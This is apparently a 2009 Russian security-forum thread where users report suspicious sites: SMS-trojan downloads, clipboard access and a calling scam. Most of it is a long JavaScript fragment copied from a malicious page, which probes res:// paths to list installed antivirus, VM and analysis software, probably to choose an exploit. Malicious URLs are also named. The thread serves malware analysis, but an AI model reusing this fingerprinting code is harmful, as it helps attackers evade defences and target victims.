-
_http://valentino4ka.co.cc
Что там?
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Сообщение от
bolshoy kot
_http://valentino4ka.co.cc
Что там?
Бяка
-
-
-
-
microsoft-security.ru
-
-
valho, и что Вас там удивило? Мне кажется, там сайт компьютерной помощи.
-
Да так ничего, помойки всякой в интернете слишком много развелось просто...
-
-
Да так ничего, помойки всякой в интернете слишком много развелось просто...
регнулись на юкозе. поменяли диз. привязали домен. согласен, что трэш
-
Единственное но - незаконно используется название Microsoft.
-
widgeo.net
При загрузке пытается получить доступ к буферу обмена.
Похоже что если разрешить доступ и полазить по сайту в буфер какую нибудь бяку пропишут.
Нашёл по этому только:
http://www.securitylab.ru/news/358290.php
http://support.microsoft.com/kb/224993/ru
---
Ссылка на эту странную вещь - mypeopleunlimited.com/mgt/old/creek.php
Последний раз редактировалось valho; 18.05.2009 в 19:37.
-
-
ugdom.ru
На самом сайте вроде бы чисто, а вот в архивах журнала...
При попытке открыть архивы подгружается Troyan.Click 25525 по классификации DrWeb.
Звонил редактору журнала - обещали принять меры, но пока ничего...
-
Сообщение от
valho
Ссылка на эту странную вещь - mypeopleunlimited.com/mgt/old/creek.php
а вещь интересная, что делает пока еще не выяснил, но похоже собирает инфу о кампе, какой софт стоит, какие антивирусы, ,браузеры плееры и куча всякого софта, вот кусок
Код:
var QmwrmsukbB = new Array(26);
var BxwrUnJUSvZkOQRnBx = "res://c:\\program%20files\\";
var eeYcZfmxOvpnjcHlzYgGirPN=0;
var DvvePofzXKCOGQVdAJyHCh=new Image();
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Avira\\AntiVir PersonalEdition Classic\\avconfig.dll/#2/#129";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Alwil Software\\Avast4\\AavmGuih.dll/#2/#132";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Antiviral Toolkit Pro\\avp32.exe/#2/#158";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Grisoft\\AVG Free\\avgabout.dll/#2/#5110";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Grisoft\\AVG7\\avgdiag.exe/#2/#131";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "AVG\\AVG8\\avgresf.dll/#2/#11500";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Softwin\\BitDefender9\\bdsubmit.exe/#2/#132";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Softwin\\BitDefender10\\bdsubmit.exe/#2/#132";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "BitDefender\\BitDefender 2008\\bdsubwiz.exe/#2/#132";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "CA\\eTrust Internet Security Suite\\eTrust EZ Antivirus\\CAVres.dll/#2/#145";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "DrWeb\\drweb32w.exe/#2/#105";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ESET\\emon.dll/#2/#1";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ESET\\ESET Smart Security\\eguiEpfw.dll/#2/#1070";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kaspersky Lab\\Kaspersky Internet Security 7.0\\mcouas.dll/#2/#218";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kaspersky Lab\\Kaspersky Internet Security 2009\\mcouas.dll/#2/#218";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kerio\\Personal Firewall 4\\kpf4gui.exe/#2/#135";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Trend Micro\\Internet Security 2006\\PCCVScan.exe/#2/#130";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Panda Software\\Panda platinium 2006 Internet Security\\pavsched.exe/#2/#300";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "F-Secure Internet Security\\FSGUI\\fsavgui.exe/#2/#26567";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "F-Secure Internet Security\\Anti-Virus\\fstsm.dll/#2/#103";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "McAfee.com\\Agent\\scres.dll/#2/#200";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Network Associates\\VirusScan\\graphics.dll/#2/#200";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "symantec_client_security\\symantec%20antivirus\\vpc32.exe/#2/#157";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Norton Internet Security Professional\\NISABOUT.DLL/#2/#204";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Symantec\\Symantec Endpoint Protection\\res\\1036\\DWHWizrdRes.dll/#2/#167";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Norton Internet Security\\ACDisp.dll/#2/#107";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "zone labs\\zonealarm\\zlclient.exe/#2/#102";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Tools\\VMControlPanel.cpl/#2/#2507";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Workstation\\vmplayer.exe/#2/#1";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Workstation\\vmplayer.exe/#2/#28";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Wireshark\\uninstall.exe/#2/#110";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "IDA\\idag.exe/#2/#201";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ShadowStor\\ShadowSurfer\\ShadowSurfer.exe/#2/#174";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\Office\\MSOWC.DLL/#2/#390";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\OFFICE10\\MSOWC.DLL/#2/#390";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\OFFICE11\\OMFC.DLL/#2/#30994";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\Office12\\OFFOWC.DLL#2#390";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Works\\1033\\Manual\\bookimg.jpg";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Mozilla Thunderbird\\chrome\\icons\\default\\addressbookWindow.ico";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Opera\\styles\\images\\center.png";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VideoLAN\\VLC\\uninstall.exe/#2/#110";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "winamp\\winamp.exe/#2/#109";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "RealVNC\\VNC4\\vncviewer.exe/#2/#120";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Messenger\\msmsgs.exe/#2/#607";
if (DvvePofzXKCOGQVdAJyHCh.height != 30)
{
QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
}
eeYcZfmxOvpnjcHlzYgGirPN++;
DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Yahoo!\\Messenger\\YPagerChecker.dll/#2/#102";
одно не понятно, как JS получает доступ к файлам кампа???
на выходных попробую разобратся.
-
вобщем так и есть, скрипт собирает информацию об установленных плагинах браузера и софте, самым болтливым оказался IE
скорее всего служит для динамического подбора эксплоита под установленное ПО.
-
-
Посмотрите на этот сайт kpyto.net.ru, знакомый говорит у него касперский сдулся на нём, мой БитДефендер сообщил о загрузке активного содержимого, я его заблокировал, и ничего подозрительного не увидел.
Во многой мудрости много печали; и кто умножает познания, умножает скорбь…
[SIGPIC][/SIGPIC]
-
_http://vero4ka.co.cc что же там?
Добавлено через 1 час 7 минут
Там JAVA-программа, видать мобильный троян. Интересно, кто нибудь догадается, что его надо в телефон загружать?
Последний раз редактировалось bolshoy kot; 26.05.2009 в 19:11.
Причина: Добавлено
-
bolshoy kot, ммм... нет...
совершенно не факт, что это для мобильника
Скачал посмотрел, внутри порно картинка и много файлов *.class + один .dat
-
-
Сообщение от
bolshoy kot
_http://valentino4ka.co.cc
Что там?
Сообщение от
Гриша
Trojan-SMS.J2ME.Boxer.i
Сообщение от
bolshoy kot
_http://vero4ka.co.cc
Сообщение от
bolshoy kot
Там JAVA-программа, видать мобильный троян. Интересно, кто нибудь догадается, что его надо в телефон загружать?
Закономерность (в имени доменов) прослеживается?
The worst foe lies within the self...
-
-
_http://jwtdigital.reali-tech.com/innovate/013/
В чем суть "развода"?
-
Какое то предложение по халявным звонкам через 013, а что это значит.......
-
-
valho, да насчет халявных звонков через 013 понятно, а вот чем "халява" может обернутся - нет...